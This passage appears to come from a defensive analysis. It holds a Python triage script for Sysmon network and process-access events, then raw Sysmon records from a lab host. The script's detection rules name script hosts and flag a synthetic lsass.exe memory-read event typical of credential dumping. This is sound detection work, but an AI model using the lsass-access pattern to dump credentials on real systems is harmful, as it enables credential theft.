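PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE", 0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA", 0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION", 0x2000: "PROCESS_SET_LIMITED_INFORMATION",
    0x10000: "DELETE", 0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC",
    0x80000: "WRITE_OWNER", 0x100000: "SYNCHRONIZE",
}
QUERY_ONLY = 0x1000 | 0x0400                        # the 0x1000 / 0x1400 floods in the dump
MEMORY_RIGHTS = 0x0002 | 0x0008 | 0x0010 | 0x0020   # create thread, VM operation/read/write
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}   # heuristic list (assumption)

SAMPLE_EVENTS: List[str] = [
    # EID 3: the interactive user's powershell.exe opening HTTPS to 10.0.1.16 (as in the dump)
    r"""<Event><System><EventID>3</EventID></System><EventData>
    <Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
    <Data Name="User">ATTACKRANGE\REED_SCHMIDT</Data><Data Name="Initiated">true</Data>
    <Data Name="DestinationIp">10.0.1.16</Data><Data Name="DestinationPort">443</Data>
    </EventData></Event>""",
    # EID 3: the Splunk forwarder service reaching its server on 8089 (as in the dump)
    r"""<Event><System><EventID>3</EventID></System><EventData>
    <Data Name="Image">C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe</Data>
    <Data Name="User">NT AUTHORITY\SYSTEM</Data><Data Name="Initiated">true</Data>
    <Data Name="DestinationIp">10.0.1.12</Data><Data Name="DestinationPort">8089</Data>
    </EventData></Event>""",
    # EID 10: the rpcss-in-svchost -> Explorer.EXE flood, GrantedAccess 0x1000 (as in the dump)
    r"""<Event><System><EventID>10</EventID></System><EventData>
    <Data Name="SourceImage">C:\Windows\system32\svchost.exe</Data>
    <Data Name="TargetImage">C:\Windows\Explorer.EXE</Data><Data Name="GrantedAccess">0x1000</Data>
    <Data Name="CallTrace">C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71</Data>
    </EventData></Event>""",
    # EID 10: synthetic record (NOT in the dump): VM_READ on lsass.exe from unbacked code
    r"""<Event><System><EventID>10</EventID></System><EventData>
    <Data Name="SourceImage">C:\Users\Public\tool.exe</Data>
    <Data Name="TargetImage">C:\Windows\system32\lsass.exe</Data><Data Name="GrantedAccess">0x1010</Data>
    <Data Name="CallTrace">C:\Windows\SYSTEM32\ntdll.dll+a6134|UNKNOWN(00000000021A0F3C)</Data>
    </EventData></Event>""",
]


def parse_event(xml_text: str) -> Dict[str, str]:
    """Flatten <System><EventID> and every <Data Name=...> into one dict."""
    fields: Dict[str, str] = {}
    for el in ET.fromstring(xml_text).iter():
        local = el.tag.rsplit("}", 1)[-1]          # tolerate the real Sysmon namespace too
        if local == "EventID":
            fields["EventID"] = (el.text or "").strip()
        elif local == "Data" and el.get("Name"):
            fields[el.get("Name")] = (el.text or "").strip()
    return fields


def decode_access(mask_hex: str) -> List[str]:
    """Return the named rights set in a GrantedAccess mask such as '0x1400'."""
    mask = int(mask_hex, 16)
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]


def triage(ev: Dict[str, str]) -> Tuple[str, str]:
    """Return (verdict, reason); verdict is 'baseline', 'review' or 'ignored'."""
    eid = ev.get("EventID")
    if eid == "3":
        image = ntpath.basename(ev.get("Image", "")).lower()
        user = ev.get("User", "")
        dest = f"{ev.get('DestinationIp')}:{ev.get('DestinationPort')}"
        # Outbound session from a script host under an interactive (non-service) account
        if (ev.get("Initiated") == "true" and image in SCRIPT_HOSTS
                and not user.upper().startswith("NT AUTHORITY\\")):
            return "review", f"{image} as {user} initiated {dest}"
        return "baseline", f"{image} -> {dest}"
    if eid == "10":
        mask = int(ev.get("GrantedAccess", "0x0"), 16)
        target = ntpath.basename(ev.get("TargetImage", "")).lower()
        rights = ",".join(decode_access(ev.get("GrantedAccess", "0x0")))
        frames = ev.get("CallTrace", "").split("|")
        unbacked = [f for f in frames if f.upper().startswith("UNKNOWN")]  # no backing module
        if (mask & ~QUERY_ONLY) == 0:               # metadata-only handle: the rpcss/lsm noise
            return "baseline", f"query-only handle to {target}: {rights}"
        if unbacked or (target == "lsass.exe" and mask & MEMORY_RIGHTS):
            return "review", f"{rights} on {target}; unbacked frames: {unbacked}"
        return "baseline", f"{rights} on {target}"
    return "ignored", f"EventID {eid} not handled"


def triage_all(xml_events: List[str]) -> List[Tuple[str, str, str]]:
    """Parse and triage a batch, returning (EventID, verdict, reason) per record."""
    out = []
    for x in xml_events:
        ev = parse_event(x)
        verdict, reason = triage(ev)
        out.append((ev.get("EventID", "?"), verdict, reason))
    return out


if __name__ == "__main__":
    for eid, verdict, reason in triage_all(SAMPLE_EVENTS):
        print(f"EID {eid:>2} {verdict:<8} {reason}")
```

The mask check is the part that keeps the Event ID 10 volume manageable: 0x1000 and 0x1400 handles (the svchost-to-Explorer and sysmon64-to-svchost records in this export) decode to query rights only and never reach the review path, while anything carrying VM_READ or an UNKNOWN call-trace frame does. Against a live Sysmon channel, feed `parse_event` the `<Event>` XML from `Get-WinEvent ... | ForEach-Object ToXml` or the forwarder's rendered XML; the namespace-stripping in the parser is there for that case.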
23542300x800000000000000036497937Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:04.734{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1791748269060866DBA76875482735FC,SHA256=584BD355C50A5E3524189AE7E3D82E155A09620FEBC8A82FCFFEF878EA82C691,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497936Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:33.923{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50596-false10.0.1.12-8000- 23542300x800000000000000036497940Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:05.917{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8BAF7621937AF2B91FC98789F07D5439,SHA256=F88ED296459D89128CA0032A2759FE71B4046D2E4016844ACD1AE9E5B862A879,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497939Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:05.764{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B78E57F998E8E1092B7547EC29C63BE2,SHA256=A3FB20570A9342D2D294B214A4AAFB99E73A7FAB786DBB7FC68DE39C8BB974BB,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 13241300x800000000000000036497938Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:20:05.501{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7a96b-0x3b77cc25) 23542300x800000000000000036497943Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:06.781{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=576454CD8661FA60814A3CA24BB35964,SHA256=106F07664ECE5D45C6178DBA172757D6BC46E4C90CE9452E0EFCB2D6436011E6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497942Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:37.165{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-987.attackrange.local123ntpfalse169.254.169.123-123ntp 354300x800000000000000036497941Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:36.520{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50597-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000036497952Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:07.962{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A187-6140-9456-04000000C801}5280C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497951Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:07.962{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497950Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:07.962{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497949Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:07.962{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497948Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:07.962 ; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801} ; SourceProcessId=732 ; SourceThreadId=4464 ; SourceImage=C:\Windows\system32\svchost.exe ; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} ; TargetProcessId=1820 ; TargetImage=C:\Windows\sysmon64.exe ; GrantedAccess=0x1400 ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
Fields common to every record below: Channel=Microsoft-Windows-Sysmon/Operational ; Computer=win-host-987.attackrange.local ; Level=4 ; Opcode=0 ; Keywords=0x8000000000000000 ; RuleName=- . Version and Task by EventID: 1 (Version=5, Task=1) ; 3 (Version=5, Task=3) ; 10 (Version=3, Task=10) ; 13 (Version=2, Task=13) ; 23 (Version=5, Task=23).
EventID=10 RecordID=36497947 UtcTime=2021-09-14 13:20:07.962 ; SourceProcessGUID={B81B27B7-4012-611D-0500-00000000C801} ; SourceProcessId=420 ; SourceThreadId=984 ; SourceImage=C:\Windows\system32\csrss.exe ; TargetProcessGUID={B81B27B7-A187-6140-9456-04000000C801} ; TargetProcessId=5280 ; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe ; GrantedAccess=0x1fffff ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventID=10 RecordID=36497946 UtcTime=2021-09-14 13:20:07.962 ; SourceProcessGUID={B81B27B7-4013-611D-2700-00000000C801} ; SourceProcessId=2076 ; SourceThreadId=3760 ; SourceImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe ; TargetProcessGUID={B81B27B7-A187-6140-9456-04000000C801} ; TargetProcessId=5280 ; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe ; GrantedAccess=0x1fffff ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=1 RecordID=36497945 UtcTime=2021-09-14 13:20:07.948 ; ProcessGuid={B81B27B7-A187-6140-9456-04000000C801} ; ProcessId=5280 ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe ; FileVersion=8.0.2 ; Description=Active Directory monitor ; Product=splunk Application ; Company=Splunk Inc. ; OriginalFileName=splunk-admon.exe ; CommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe" ; CurrentDirectory=C:\Windows\system32\ ; User=NT AUTHORITY\SYSTEM ; LogonGuid={B81B27B7-4012-611D-E703-000000000000} ; LogonId=0x3e7 ; TerminalSessionId=0 ; IntegrityLevel=System ; Hashes=MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165 ; ParentProcessGuid={B81B27B7-4013-611D-2700-00000000C801} ; ParentProcessId=2076 ; ParentImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe ; ParentCommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
EventID=23 RecordID=36497944 UtcTime=2021-09-14 13:20:07.815 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; Hashes=MD5=C778F69A181BB8089F33A9D33E874433,SHA256=98B1C22135343723BDCBC6DA7BE1206284322A188986F71941A0FD10E71B4415,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=23 RecordID=36497962 UtcTime=2021-09-14 13:20:08.845 ; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801} ; ProcessId=2188 ; User=NT AUTHORITY\SYSTEM ; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; Hashes=MD5=0149572B6DF6F8DAA327DAC59D726DF4,SHA256=5AF0978F717638B9D00D34E5F4A515614F518F8DFFB69D7B4E44A27CF0589B5D,IMPHASH=00000000000000000000000000000000 ; IsExecutable=false ; Archived=false - insufficient disk space
EventID=10 RecordID=36497961 UtcTime=2021-09-14 13:20:08.661 ; SourceProcessGUID={B81B27B7-4014-611D-3000-00000000C801} ; SourceProcessId=3144 ; SourceThreadId=3164 ; SourceImage=C:\Windows\system32\conhost.exe ; TargetProcessGUID={B81B27B7-A188-6140-9556-04000000C801} ; TargetProcessId=6784 ; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe ; GrantedAccess=0x1fffff ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36497960 UtcTime=2021-09-14 13:20:08.661 ; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801} ; SourceProcessId=732 ; SourceThreadId=4464 ; SourceImage=C:\Windows\system32\svchost.exe ; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} ; TargetProcessId=1820 ; TargetImage=C:\Windows\sysmon64.exe ; GrantedAccess=0x1400 ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36497959 UtcTime=2021-09-14 13:20:08.661 ; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801} ; SourceProcessId=732 ; SourceThreadId=4464 ; SourceImage=C:\Windows\system32\svchost.exe ; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} ; TargetProcessId=1820 ; TargetImage=C:\Windows\sysmon64.exe ; GrantedAccess=0x1400 ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36497958 UtcTime=2021-09-14 13:20:08.661 ; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801} ; SourceProcessId=732 ; SourceThreadId=4464 ; SourceImage=C:\Windows\system32\svchost.exe ; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} ; TargetProcessId=1820 ; TargetImage=C:\Windows\sysmon64.exe ; GrantedAccess=0x1400 ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36497957 UtcTime=2021-09-14 13:20:08.661 ; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801} ; SourceProcessId=732 ; SourceThreadId=4464 ; SourceImage=C:\Windows\system32\svchost.exe ; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801} ; TargetProcessId=1820 ; TargetImage=C:\Windows\sysmon64.exe ; GrantedAccess=0x1400 ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
EventID=10 RecordID=36497956 UtcTime=2021-09-14 13:20:08.661 ; SourceProcessGUID={B81B27B7-4012-611D-0500-00000000C801} ; SourceProcessId=420 ; SourceThreadId=536 ; SourceImage=C:\Windows\system32\csrss.exe ; TargetProcessGUID={B81B27B7-A188-6140-9556-04000000C801} ; TargetProcessId=6784 ; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe ; GrantedAccess=0x1fffff ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
EventID=10 RecordID=36497955 UtcTime=2021-09-14 13:20:08.661 ; SourceProcessGUID={B81B27B7-4013-611D-2700-00000000C801} ; SourceProcessId=2076 ; SourceThreadId=3760 ; SourceImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe ; TargetProcessGUID={B81B27B7-A188-6140-9556-04000000C801} ; TargetProcessId=6784 ; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe ; GrantedAccess=0x1fffff ; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
